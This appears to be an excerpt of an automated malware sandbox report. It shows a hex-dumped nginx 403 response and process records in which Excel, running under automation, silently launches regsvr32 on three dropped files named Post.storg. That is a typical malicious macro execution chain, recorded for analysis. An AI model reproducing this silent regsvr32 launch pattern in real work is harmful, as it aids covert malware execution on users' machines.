                                                                                                                                                      Date: Wed, 09 Jun 2021 07:36:12 GMT
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Content-Length: 548
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                      Code Manipulations

                                                                                                                                                      Statistics

                                                                                                                                                      Behavior

                                                                                                                                                      Click to jump to process

                                                                                                                                                      System Behavior

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:26
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                      File size:27110184 bytes
                                                                                                                                                      MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:57
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\Post.storg
                                                                                                                                                      Imagebase:0xe60000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:58
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\Post.storg1
                                                                                                                                                      Imagebase:0xe60000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      General

                                                                                                                                                      Start time:09:39:58
                                                                                                                                                      Start date:09/06/2021
                                                                                                                                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:regsvr32 -s ..\Post.storg2
                                                                                                                                                      Imagebase:0xe60000
                                                                                                                                                      File size:20992 bytes
                                                                                                                                                      MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high

                                                                                                                                                      Disassembly

                                                                                                                                                      Code Analysis

                                                                                                                                                      Reset < >